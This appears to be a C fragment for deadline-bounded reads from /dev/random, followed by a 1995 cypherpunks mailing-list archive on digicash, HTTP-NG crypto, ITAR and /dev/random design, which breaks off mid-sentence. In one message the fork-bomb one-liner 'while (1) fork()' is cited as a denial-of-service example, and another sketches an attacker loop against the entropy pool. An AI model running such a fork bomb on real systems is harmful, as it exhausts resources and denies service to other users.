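/* Monotonic clock in milliseconds, immune to wall-clock adjustments. */
static long long now_ms(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (long long)ts.tv_sec * 1000 + ts.tv_nsec / 1000000;
}

/*
 * Read exactly len bytes from fd, waiting at most timeout_ms in total.
 * A short read is not an error: the loop keeps going until the buffer
 * is full, the deadline passes, or the descriptor reports EOF/error.
 * *got always holds the number of bytes actually stored.
 */
int read_full_deadline(int fd, unsigned char *buf, size_t len,
                       int timeout_ms, size_t *got)
{
    long long deadline = now_ms() + timeout_ms;

    *got = 0;
    while (*got < len) {
        long long left = deadline - now_ms();
        struct pollfd p;
        ssize_t n;
        int r;

        if (left < 0)
            left = 0;
        p.fd = fd;
        p.events = POLLIN;
        p.revents = 0;
        r = poll(&p, 1, (int)left);      /* wait for data, bounded */
        if (r < 0) {
            if (errno == EINTR)
                continue;
            return RF_ERROR;
        }
        if (r == 0)
            return RF_TIMEOUT;           /* pool stayed empty too long */
        n = read(fd, buf + *got, len - *got);
        if (n < 0) {
            if (errno == EINTR || errno == EAGAIN)
                continue;
            return RF_ERROR;
        }
        if (n == 0)
            return RF_EOF;
        *got += (size_t)n;               /* may be fewer than requested */
    }
    return RF_OK;
}

/*
 * Fail closed: on anything but a complete read, wipe the partial
 * output so the caller cannot use a half-filled key by mistake.
 */
int get_key_material(unsigned char *key, size_t len, int timeout_ms)
{
    size_t got;
    int rc;
    int fd = open("/dev/random", O_RDONLY);

    if (fd < 0)
        return RF_ERROR;
    rc = read_full_deadline(fd, key, len, timeout_ms, &got);
    close(fd);
    if (rc != RF_OK)
        memset(key, 0, len);
    return rc;
}

int main(void)
{
    unsigned char key[16];
    size_t i;
    int rc = get_key_material(key, sizeof key, 5000);

    if (rc != RF_OK) {
        fprintf(stderr, "no key generated: entropy read failed (%d)\n", rc);
        return 1;
    }
    for (i = 0; i < sizeof key; i++)
        printf("%02x", key[i]);
    putchar('\n');
    return 0;
}
```
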




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 31 Oct 1995 12:36:02 +0800
To: cypherpunks@toad.com
Subject: Re: Cuban Security Conference
In-Reply-To: <199510301723.JAA22047@ix9.ix.netcom.com>
Message-ID: <qJgTDD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
> >		International Conference Center
> >		     Pabexpo, Havana, Cuba
> >			March 4-9, 1996
> >	3rd Ibero-American Seminar on Protection against
> >    Computer Viruses and Security of Information Technologies
>
> I wonder if they'd be receptive to talks on private communications,
> digicash, tax avoidance through digital technology, anarchy and
> collapse of government power, etc. :-)

I don't know about the current situation, but back in the '80's, Cuba was
more high-tech than much of Eastern Europe.  I got an e-mail from Cuba
sent via the USSR and the Internet circa 1988; way before countries like
Poland or Romania had any sort of net.presence.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 31 Oct 1995 07:47:44 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
In-Reply-To: <acb9bb9700021004f83d@[205.199.118.202]>
Message-ID: <473jfp$pll@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.951030121921.17834E-100000@tipper.oit.unc.edu>,
Simon Spero <ses@tipper.oit.unc.edu> wrote:
> One point worth noting is that the 5% cut used to be a typical fee for 
> credit-card transactions. However, that cut only happened once per 
> purchase, whereas digicash may incur this fee many more times.

I think there are two major differences between credit cards and digicash
that affect the pricing structure.

1. Applicability

We think of eventually using digicash for everything.  You wouldn't just
use it to pay Sears for a sweater, but Sears would use it to pay for the
wool and for their taxes.  A 5% hit may be ok for the final transaction,
but it's impossible if you incur it every time money is exchanged.

Credit cards are mostly consumer items and don't have this problem as
much, and the states have invented resale licenses specifically to exempt
you from paying sales tax at every step.  I realize that digicash is being
marketed as a consumer item, but I'd like to see it eventually become a
standard banking instrument.  I certainly trust it more than I trust EFT.

2. Float

Cash schemes are unique in that while your money is in the ecash mint,
the bank has the use of it.  Don't underestimate the importance of this
in a high-volume business; if digicash were popular, the banks would
cut their margins to the point where this would probably be the major
source of revenue.  But it would be substantial.

I think digicash ought to be priced comparably to traveller's checks.
That is what they are closest to.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJVRJOyjYMb1RsVfAQGMeQP/eg77ud1E1lyoWhERLkHXOawHaaUXcz/j
mZoCD4ujmkiBmOmvqCyITG9UFOKSjzJ4aA8AC81AVPhCxVLIahMLZBFb2IvANz4r
jLJraWyBNWpLk4TN/djwPcMdtMcQsAMTWB5IYeQDvp3IWS/rnIr01Zs0RiKYlE3q
7X5zuwDMujc=
=BBfH
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 31 Oct 1995 12:05:03 +0800
To: ses@tipper.oit.unc.edu
Subject: Re:  Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510310330.AA08343@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


All your individual answers make sense.

Taken together, tho, they make HTTP-NG worrisome on the crypto front.

For example, it's probably a real bad idea to replace DES with something
commonly called RC4.  The former has been under public scrutiny for years,
the latter still has not formally emerged from the shroud of trade secret.
The keyed MD5 responses also don't inspire confidence.

With all due respect, I strongly encourage you to leave crypto out of
HTTP-NG for the time being.  Wait to see what happens from the various
IPng security, SSL, S-HTTP, the W3C work, et cetera.  Leave some "holes"
in the protocol, but don't tie anything down now.  Far better for the
Web to wait six to 12 months for HTTP-NG, than for mistakes to occur
in this area.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 31 Oct 1995 08:02:31 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510301925.VAA27116@grumble.grondar.za>
Message-ID: <473k3p$pt2@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510301925.VAA27116@grumble.grondar.za>,
Mark Murray <mark@grondar.za> wrote:
> Something I didn't mention earlier; we felt that letting the unwashed
> masses read /dev/*random was not a good idea, as they could deplete
> the pool of entropy all too easily for attack purposes.

That's really just a DOS attack, isn't it?  An application that needs
true randomness should be using /dev/random, which you can slow but not
disturb, and an application that is using /dev/urandom should be ok with
less than full entropy.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJVTqeyjYMb1RsVfAQGqYwP/W6xUdsxwCMrWlvmuPrfV4yfaYpZWt3JW
/ld8HsqyQt5XRkbNwq/hcXDle13exEaqzXe2l6qHtR3qySEaU/4WF/BgSTwqpQa+
iA6p8KL51XPluNF9oagMrmOR2J4yxMPldrx5m/+WcZRJj4mdfzxQoMQ9J4agTVsC
l2spGY8iNkA=
=9cfz
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fen Labalme <fen@comedia.com>
Date: Tue, 31 Oct 1995 15:44:16 +0800
To: cypherpunks@toad.com
Subject: FWD: Electronic Warfare (from the digitaliberty list)
Message-ID: <199510310725.XAA06543@imagine.comedia.com>
MIME-Version: 1.0
Content-Type: text/plain


Interesting (if a bit mild for this list) article from another list some of
you might be interested in (or already subscribed to)....

---- Forwarded Message ----

From: owner-digitaliberty@phantom.com
Date: Tue, 31 Oct 1995 01:00:06 -0500
To: digitaliberty-digest@piltdown.phantom.com
Subject:   digitaliberty V1 #13


digitaliberty             Tuesday, 31 October 1995      Volume 01 : Number 013

In this issue:

Test
Electronic Warfare

See the end of the digest for information on subscribing to the Digitaliberty
or Digitaliberty-Digest mailing lists.

----------------------------------------------------------------------

From: Bill Frezza (via RadioMail) <frezza@radiomail.net>
Date: Mon, 30 Oct 1995 13:14:58 -0800
Subject: Test

This is a test. <sigh>

------------------------------

From: DigitaLib@aol.com
Date: Mon, 30 Oct 1995 18:02:17 -0500
Subject: Electronic Warfare

Folks,

Attached is a column that ran on the op-ed page of today's Communications
Week. I have agreed to do bi-weekly opinion pieces for them focussing on the
impact of technology on society, politics, and culture - all with a
DigitaLibertarian slant (of course). My hope is that this feisty group can
keep me fed with grist for these pieces.

For anyone that lives in NYC, I will be carrying the DigitaLiberty banner on
a panel on digital commerce at the Multimedia Design conference at the Javits
center Friday 11/3 at 3:30pm. Stop by and say hello.

Regards,

Bill

- ---------------------------------------------------------------------------

ELECTRONIC WARFARE WAGES ON - AND YOU'RE THE TARGET

Although the flap over the Clinton administration's attempt to promote
escrowed-key encryption systems like Clipper has temporarily faded, the war
on electronic privacy continues.   As proceedings at the Fourth International
Conference on Money Laundering, Forfeiture, Asset Recovery, Offshore
Investments, the Pacific Rim, and International Financial Crimes reveal,
there has been no let up in our government's efforts to blockade the
cyber-frontier.

No, you won't learn much from the Wall Street Journal or the New York Times,
written by journalist-generalists who have no clue about where this
technology is heading.  The Feds have become so skilled at manipulating the
Old Media that stories about electronic privacy  invariably center on the
latest drug kingpin, pedophile, or domestic terrorist.  Attacking these
universally abhorred enemies of the people not only makes for good headlines
but keeps privacy advocates off balance as they are forced to defend abstract
rights using loathsome examples.  But if you tune in to the Cypherpunks
mailing list (majordomo@toad.com) you can get some excellent first hand
reports from the front.

In the relatively short period since the passage of the Bank Secrecy Act,
which, among other things, obliges banks to file Suspicious Activity Reports
on its customers, banks have become virtual deputies in the treasury
department's war on uncontrolled financial transactions.  And this war is
increasingly spilling into cyberspace.

The conference underscored the fact that, paradoxically, we are heading not
toward more specific and well defined transaction monitoring regulations, but
less.  How so?  The problem with making regulations precise is that what
software algorithms can define, other algorithms can evade.  Instead,
regulation by "raised eyebrow" is becoming the norm.  Federal bank examiners
have been given significant latitude to invoke draconian penalties against
uncooperative banks.  Because bank officers have few due-process protections
under this regime, it is no surprise that most of them have become sniveling
toadies.  The objective is to insure that banks "voluntarily" introduce even
more aggressive, unpredictable, and intrusive monitoring than the government
would ever dare mandate.  And to make sure nothing slips through the cracks,
human surveillance will be supplemented with artificial-intelligence agents
that can perform pattern analysis on the aggregate flow of electronic
transactions, flagging anything remotely suspicious.  George Orwell would be
impressed.

Lest you think that all of this is motivated solely by the drug war,  a visit
to the Treasury Department's Financial Crimes Enforcement Network (FinCEN)
homepage (http://www.ustreas.gov/treasury/bureaus/fincen/facts.html) should
open your eyes.  This battle is not just about drug prohibition, a crime the
Treasury Department would have to invent if it didn't already exist.  The
real struggle is about the future of tax compliance, and it has you in its
sights.

A famous Revolutionary War era pamphleteer, writing under the pseudonym
"Brutus", perhaps said it best 200 years ago when he wrote - "The national
government through its taxing power will introduce itself into every corner
of the city and country.  It will take cognizance of the professional man in
his office or his study;  it will watch the merchant in his store;  it will
follow the mechanic to his shop and his work, and will haunt him in his
family and his bed;  it will be the constant companion to the industrious
farmer in his labour;  it will penetrate into the most obscure cottage;  and
finally it will light upon the head of every person in the United States.  To
all these different classes of people and in all these circumstances on which
it will attend them, the language in which it will address them will be GIVE!
GIVE!"

What Brutus didn't know and what the cypherpunks foresee is that one day
strong encryption will make it impossible to spy on our activities in
cyberspace.  Heightened conflict is inevitable.  Expect the rhetoric to get a
lot hotter as the government spinmeisters labor to keep us focused on public
enemies while frantically trying to keep its hand in every citizen's pocket
and its eyes on every bankbook. 

# # #
COPYRIGHT CMP PUBLICATIONS 1995

Bill Frezza is president at Wireless Computing Associates and co-founder of
the online forum DigitaLiberty.  The opinions expressed are his own. Frezza
can be reached at frezza@interramp.com.


------------------------------

End of digitaliberty V1 #13
***************************

To subscribe to Digitaliberty-Digest, send the command:

subscribe digitaliberty-digest

in the body of a message to "Majordomo@phantom.COM".  If you want
to subscribe something other than the account the mail is coming from,
such as a local redistribution list, then append that address to the
"subscribe" command; for example, to subscribe "local-digitaliberty":

subscribe digitaliberty-digest local-digitaliberty@your.domain.net

A non-digest (direct mail) version of this list is also available; to
subscribe to that instead, replace all instances of "digitaliberty-digest"
in the commands above with "digitaliberty".

---- End Forwarded Message ----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 31 Oct 1995 12:54:37 +0800
To: Rich Salz <cypherpunks@toad.com
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510310330.AA08343@sulphur.osf.org>
Message-ID: <9510310427.AA28252@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>For example, it's probably a real bad idea to replace DES with something
>commonly called RC4.  The former has been under public scrutiny for years,
>the latter still has not formally emerged from the shroud of trade secret.
>The keyed MD5 responses also don't inspire confidence.

I disagree. Basically Simon simply has to stick in some parameters so that
the crypto alg can change with time. There should be slots for the following 
algs :-

Symmetric cipher	IDEA, RC4, 3DES
Keyed Digest		KD* (paper to follow, there are 7 to choose from).

Key exchange		Diffie-Hellman, El Gamal, RSA
Signature		RSA, El Gamal, Rabin (Shamir variation), DSS
Hash functions		MD5, SHA

I don't think that we are intending to tap Simon's skill in designing
ciphers. We have Ron Rivest and Taher El Gamal for that, plus help from
Adi Shamir and if we get stuck I'll bang on some other doors. I really don't 
think we have a problem lacking cryptographers. Simon is putting in security 
input which is different. We have an equally star studded cast for that side of 
things (and if we get stuck I'll e-mail some more characters).

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 31 Oct 1995 13:00:38 +0800
To: rsalz@osf.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510310430.AA08480@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


How are you going to handle mechanism negotiation?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 31 Oct 1995 07:36:57 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510302148.XAA00832@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>    Something I didn't mention earlier; we felt that letting the unwashed
>    masses read /dev/*random was not a good idea, as they could deplete
>    the pool of entropy all too easily for attack purposes.
> 
> That should be a system administration issue.  If someone wants to make
> /dev/random readable only by root at their site, that's their business.
> I don't see any point in trying to enforce that in the kernel code.

It's not in the kernel, this is just the permissions on /dev/*random.

> I don't agree that restricting read access is useful.  First of all, if
> the pool of entropy is depleted, someone who tries to obtain entropy by
> reading /dev/random will know that they didn't get enough entropy.  So
> assuming a program that actually checks return values from system calls,
> this is at worst a denial of service attack, and there are much easier
> ways of performing those sorts of attacks: "while (1) fork()", for
> example.

Hmm. Lemme think about this...

> Secondly, making /dev/random only readable by "privileged programs"
> means that people won't be able to compile their own version of PGP that
> can take advantage of the random number generator.  Instead, they would
> have to use a setuid version of PGP, and I'm quite sure PGP wasn't
> written such that it would be safe to turn on its setuid bit.  

How about SetGID? We were going for 660 root.kmem.

> Finally, even if you did have trustworthy applications which you could
> setuid and only allow those programs to have access to /dev/random,
> someone who repeatedly ran those applications could still end up
> depleting the pool of entropy.
> 
> So in the general case I would advise that /dev/random be left world
> readable, since you *do* want general user programs to have access to
> high quality random numbers.  

Ponder... I'll put this forward.

> Again, /dev/random can be set to whatever permissions the system
> administrator wants.  Secondly, writing to /dev/random merely adds
> randomness to the pool, via the mixing algorithm.  It won't actually
> permit people to *set* the state of the pool, and assuming that the
> state of the pool is not known before the write operation, writing to it
> won't allow the user to know what the state is after the write
> operation.

What happens if some attacker does:

for (;;) {
	write_to_devrandom(NULL);
	check_to_see_if_state_is_crackable();
}

? "Gut feel" suggests to me that large amounts of "predicted" input might
be worse than the normal sort of system noise you have been using.

> And, for race condition reasons, something which I need to implement
> soon is an ioctl(), usable only by root, that simultaneously updates
> the entropy estimate *and* submits data to be mixed into the pool.  (Why
> this is necessary should be obvious after a few minutes thought.)

Clue me in - I'm not quite with you? :-)

>    Are you sure about this? The stochasticity of this would be pretty
>    hefty. Not only would our attacker have to get the _time_ that the
>    interrupt occurred (if it interrupted our machine), he would then have
>    to process in brute-force mode all possible times in his error range.
>    What is more, more interrupts are coming in...
> 
> I didn't say that it would be trivial for an attacker to do this, but
> it's certainly *doable*.  Some of the network traffic analyzers that
> have been made available (I think Sandia National Labs has one that does
> this), record down to millisecond accuracy when a packet was sniffed on
> the network.  

Is this millisecond accuracy quantifiable in terms of bits of entropy?
if so, the ethernet is surely safe?

> For this reason, people shouldn't really trust initializing PGP's random
> number generator over a network connection, since it is possible for an
> adversary to obtain very high quality timings of when your telnet or
> rlogin packets appeared on the network, and hence be able to guess
> (within some error range) what the interkeyboard timings which PGP used
> to initialize its random number generator were.
> 
> The adversary might have to try a large number of possibilities, but if
> the number of possibilities is less than a brute-force search, you
> definitely have a weakness --- a fact which Netscape learned to its
> embarrassment a few weeks ago.

Again, if you can quantify the number of possibilities into bits of entropy,
your code is good. Depending on current technology, this may have to change.

M

--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 1 Nov 1995 00:52:59 +0800
To: stewarts@ix.netcom.com>
Subject: Re: Cuban Security Conference
Message-ID: <199510310707.XAA17024@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 10/30/95 -0500, s1113645@tesla.cc.uottawa.ca wrote:
> For that matter is civilian use of strong (or any other kind) crypto actually
> legal in Cuba? Anyone know the policies? (duh, lemme guess...)

Well everything is legal in Cuba since there are no discernable laws, only
policies, however at the time that I visited Cuba those phones available
to ordinary citizens had a phonekeeper seated right beside the phone.

On the other hand, no one would stop you setting up a data haven or
some such in Cuba, provided it was strictly off limits to Cubans, 
but you could not set up a bank, because sooner or later somebody 
quite important would help themselves to the bank's assets.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Tue, 31 Oct 1995 15:05:54 +0800
To: Doug.Hughes@Eng.Auburn.EDU (Doug Hughes)
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <doug-9509302237.AA0062331@netman.eng.auburn.edu>
Message-ID: <3095c7353a43002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Doug Hughes said:
> >  Since you deal with security issues maybe you can help me to learn 
> >about some issues with encryption.  I am talking with one of the 
> >administration people about putting PGP on the system for everyone to 
> >use, but there are issues for them (the admin) as they might be liable, 
> >even if they can't read the e-mail.  What other legal considerations 
> >should be evaluated?
> >  Are there any large organizations (like any other universities) that
> >allow their students to use PGP, and have the system in place to make it 
> >easier for the students?  If it is offered here I might be the one to add 
> >to the mail program (pine) that is generally used to transparently use 
> >PGP, which is what I mean by having a system set up for the encryption. 
> >  Thanx for any help.  Take care and have fun.
> >
> >James Black
> >black@suntan.eng.usf.edu
> >
> >
> We have approx 1000 machines and 5000 user accounts and have pgp installed.
> I can't think of any reason not to have it installed, and lots of good
> reasons for having it installed.

We currently have PGP installed on our 2 central email servers that
have approximately 20,000 users. We haven't integrated it at this
point into Pine, etc mostly due to time and resources. 

I don't know why inability to read e-mail would cause liability,
and moving 2 million messages a week, I don't think that anyone
could be expected to know what users are sending. We only respond
to complaints.

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 31 Oct 1995 15:58:12 +0800
To: cypherpunks@toad.com
Subject: Using Holographic Memory Crystals for Encryption
Message-ID: <Pine.SUN.3.90.951031013236.2277B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain



*WARNING*
I have no idea what I am about to talk about.
This is a midnight rant. Take it as it is.
*WARNING*

I just finished reading the article on Holographic Memories on the latest
Scientific American by Demetri Psaltis and Fai Mok. At the end they
mention that "Given a hologram, either one of the two beams that 
interfered to create it can be used to reconstruct the other. What this 
means, in a holographic memory, is that it is possible not only to orient 
a reference beam into the crystal at a certain angle to select an 
individual holographic page but also to accomplish the reverse. 
Illuminating a crystal with one of the stored images gives rise to an 
approximation of the associated reference beam, reproduced as a plane 
wave emanating from the crystal at the appropriate angle."

	I was thinking this is simply a kind of XOR here: given one image
you can obtain the other. Now this combined with the fact that you need
to know the right angle could make for some interesting stuff. You could
make a system where you give it the initial angle and password which is
illuminated into the crystal to reveal the encoded data; add to this some
feedback mechanism where the angle changes depending on some function of
the data and things get interesting.

	It's late and I am tired. But if anyone has any ideas I would love
to hear them. Good night.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 31 Oct 1995 16:17:24 +0800
To: cypherpunks@toad.com
Subject: Digicash on Scientific American
Message-ID: <Pine.SUN.3.90.951031015937.2277C-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Another thing before I go to bed. In the November issue of Scientific
American the Essay column written by Anne Eisenberg is titled "Doing
Business on the Net". It's short (one page), but mentions PK crypto,
touches upon the dangers that online transactions pose to privacy, and
talks a bit about ecash. Sadly there is no mention of ITAR *sigh*

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@netscape.com (Jsw@netscape.com)
Date: Wed, 1 Nov 1995 05:36:11 +0800
To: cypherpunks@toad.com
Subject: RE: CJR RETURNED TO SENDER
Message-ID: <9510310631062323@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


From: Jeff Weinstein <jsw@netscape.com>
Subject: Re: CJR returned to sender
Date: Mon, 30 Oct 1995 22:16:18 -0800
Organization: Netscape Communications Corporation

Timothy C. May wrote:
> 
> At 4:43 PM 10/26/95, Jeff Weinstein wrote:
> 
> >  The ITARs are currently keeping us(Netscape) from distributing
> >our US-only products to people within the United States.  We have
> >asked for clarification from the government about network distribution,
> >such as how much verification of location and citizenship of the
> >recipient we must do, and have yet to receive a response.  That
> >makes it more than just an export issue, at least for us.
> 
> And I agree that this is a much more important issue than whether a t-shirt
> can get an OK for export or not.
> 
> If the CJR for the t-shirt is ultimately granted, what useful information
> will be derived, or what implications for Netscape's question will be
> discovered?
> 
> If the CJR for the t-shirt is ultimately denied, ditto?

  It will force the bureaucrats to make a decision, which will be
subject to much public scrutiny.  Hopefully it will generate a
stir in the press and inform many more people of the problems of
the current system.

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Nov 1995 00:13:47 +0800
To: cypherpunks@toad.com
Subject: payee anonymity
Message-ID: <199510311535.HAA05408@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Another way payees could be anonymous would be to immediately spend their
received coins, and do so anonymously.  This works for the online ecash
system.  They simply pass the coins on without first exchanging them at
the bank.  There would have to be something they wanted to buy that they
could receive anonymously, though.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 31 Oct 1995 23:34:06 +0800
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510311509.HAA23755@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 10/30/95 -0800, Jeff Weinstein wrote:
>  It [CJR application for T shirts] will force the bureaucrats 
> to make a decision, 

You cannot force bureaucrats to make a decision.

They will act if it suits their purpose, and otherwise they
will not act.

Basic principle of strategy in Go:  If you give the other 
guy choices, you will lose.  That is why go players always 
play asymmetrically if the stones are symmetric.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 31 Oct 1995 14:32:45 +0800
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510310612.IAA03091@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> When /dev/random doesn't have "enough" entropy left does reading
> from it return an error, or block?  I would strongly suggest
> blocking, as the non-blocking behavior is not really all that useful.

It returns EOF.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 1 Nov 1995 02:17:21 +0800
To: cypherpunks@toad.com
Subject: ecash remailer
Message-ID: <199510311625.IAA07105@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


To provide payee anonymity:

Enterprising cypherpunk, Ed sets up the Ecash Remailer.

Alice pays Bob e$15. Alice is anonymous.
Bob sends Ed the e$15
Ed cashes the e$ into his ecash mint account, withdraws e$13.50
then pays Bob those e$14 .. Bob can now spend those e$ at will.

	Bob is now anonymous.

	This requires some trust-in-Ed, but Bob could be anonymous
from Ed just as Ed is anonymous.

	Perhaps this is the scheme lucky mentioned. I will have to get
an account and implement it.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 1 Nov 1995 08:41:50 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <DHAMpE.34y@sgi.sgi.com>
Message-ID: <199510311648.IAA05877@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DHAMpE.34y@sgi.sgi.com>, "Theodore Ts'o" <tytso@MIT.EDU> writes:

>    Date: Mon, 30 Oct 1995 21:59:14 -0500
>    From: "Josh M. Osborne" <stripes@va.pubnix.com>

>    When /dev/random doesn't have "enough" entropy left does reading
>    from it return an error, or block?  I would strongly suggest
>    blocking, as the non-blocking behavior is not really all that useful.

> It acts like many character devices and named pipes in that if there is
> no entropy available at all, it blocks.  If there is some entropy
> available, but not enough, it returns what is available.  (A subsequent
> read will then block, since no entropy will then be available.)

> Actually, what's currently in Linux doesn't work precisely like this,
> but it will soon.  After talking to a number of people on both sides of the
> block vs. non-blocking camp, this seemed to be a suitable compromise.
> At least one Major Workstation Vendor is planning on using this behavior
> for their /dev/random, to appear in a future OS release.  If we all can
> standardize on this behavior, it'll make application writers' jobs that
> much easier.

One problem with this scheme is that if multiple processes have
/dev/random open you can block unexpectedly.  If I try to avoid blocking
by first checking if entropy is available there's a race condition if
another process reads from the device.  Is there another way to avoid
blocking?

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Nov 1995 03:33:11 +0800
To: cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <199510311625.IAA07105@infinity.c2.org>
Message-ID: <199510311703.JAA14785@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> writes:

>To provide payee anonymity:

>Enterprising cypherpunk, Ed sets up the Ecash Remailer.

>Alice pays Bob e$15. Alice is anonymous.
>Bob sends Ed the e$15
>Ed cashes the e$ into his ecash mint account, withdraws e$13.50
>then pays Bob those e$14 .. Bob can now spend those e$ at will.

>	Bob is now anonymous.

>	This requires some trust-in-Ed, but Bob could be anonymous
>from Ed just as Ed is anonymous.

>	Perhaps this is the scheme lucky mentioned. I will have to get
>an account and implement it.

I think this is basically the scheme Lucky mentioned.  A more elaborate
version would have Bob sending Ed blinded proto-coins to be used in the
withdrawal.  However this would require hacking the ecash protocols to
work differently than intended, which would probably infringe the
patents.

What about this, though: Alice did not mean to pay Bob, but rather
Charlie, and Bob stole the coins.  He launders them through Ed's
service.  Charlie never got the cash, and Alice complains to the bank
that the coins were stolen.  The bank says, fine, we can identify the
